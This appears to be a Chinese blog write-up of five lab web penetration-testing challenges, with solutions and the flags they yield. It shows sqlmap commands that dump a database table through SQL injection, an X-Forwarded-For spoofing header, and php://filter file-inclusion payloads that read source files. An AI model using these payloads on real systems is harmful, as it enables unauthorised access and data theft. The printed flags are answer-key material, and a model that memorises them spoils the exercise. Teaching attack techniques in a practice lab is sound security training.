Web安全渗透测试
任务环境说明:

服务器场景:PYsystem003(关闭链接)
服务器操作系统:未知
用户名:未知 密码:未知

1.    通过浏览器访问http://靶机服务器IP/1,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;

连续按F12就能查源码

flag{fc35fdc70d5fc69d269883a822c7a53e}

2.    通过浏览器访问http://靶机服务器IP/2,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;

传参id=1可见是一个sql注入,直接sqlmap跑就行

sqlmap -u "url" --current-db  #--current-db参数获取当前正在使用的数据库

跑出来是mysql库

sqlmap -u "url" -tables -D mysql  #获取库中表

其中有一个comehere!!!表

sqlmap -u "url" -columns -T "comehere\!\!\!" -D mysql   #获取字段,表名这里要使用转义字符才能正常使用

跑出来只有一个字段F1Ag

sqlmap -u "http://172.16.102.247/2/aa.php?id=1" --dump -C F1Ag -T "comehere\!\!\!" -D "mysql"  #获取字段下的信息

f14g{187ef4436122d1cc2f40dc2b92f0eba0}

3.    通过浏览器访问http://靶机服务器IP/3,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;

禁止爬虫就是rebots.txt文件,直接访问

文件中包含flag文件,直接访问flag文件就行

flag{8c7dd922ad47494fc02c388e12c00eac}

4.    通过浏览器访问http://靶机服务器IP/4,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;

本地访问可以看出是XFF伪造

BP抓包之后,改一下包就行

插入一行

X-Forwarded-For:127.0.0.1

flag{c71b47723409ac75d3e6b28f78b372ce}

5.    通过浏览器访问http://靶机服务器IP/5,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交。

从file可以看出是一个文件包含

尝试base64加密访问一下主页

file=php://filter/read=convert.base64-encode/resource=index.php

base64解密一下文本

file=php://filter/read=convert.base64-encode/resource=flag.php

同样base64解码

flag{098f6bcd4621d373cade4e832627b4f6}

最新文章

  1. R语言-数据高级管理
  2. vs2013外接程序”VMDebugger”加载异常处理
  3. mybatis动态SQL - like
  4. 利用Gson和SharePreference存储结构化数据
  5. mysql 截取字符
  6. 认识JavaScript的原型
  7. wxpython 布局管理
  8. 转:js包装DOM对象
  9. 第三题 有如下Student 对象,  private String name;       private int age;       private int score;   private String classNum;  其中,classNum&
  10. Python可视化库Matplotlib的使用
  11. Java高并发秒杀系统API之SSM框架集成swagger与AdminLTE
  12. SDN第四次作业
  13. web报表工具FineReport的公式编辑框的语法简介
  14. HTML(二)HTML元素(整体结构,块级元素,内联元素,结构元素,交互元素,元素嵌套规则)
  15. 使用css设置三角形
  16. 《机器学习实战(基于scikit-learn和TensorFlow)》第六章内容学习心得
  17. TextField
  18. 什么是车辆识别代码(VIN)
  19. DNS解析全过程分析
  20. ASP.NET MVC验证码演示

热门文章

  1. Java基础——方法
  2. 配置RMAN(缩减版)
  3. C#中Newtonsoft.Json.dll 的使用
  4. 最长公共子序列(LCS)tzoj:5752
  5. continue的使用
  6. UNIT TWO
  7. Django 介绍及环境准备
  8. html页面下载为docx文档
  9. 进入容器后不显示id
  10. DataRow[]数组转换为DataTable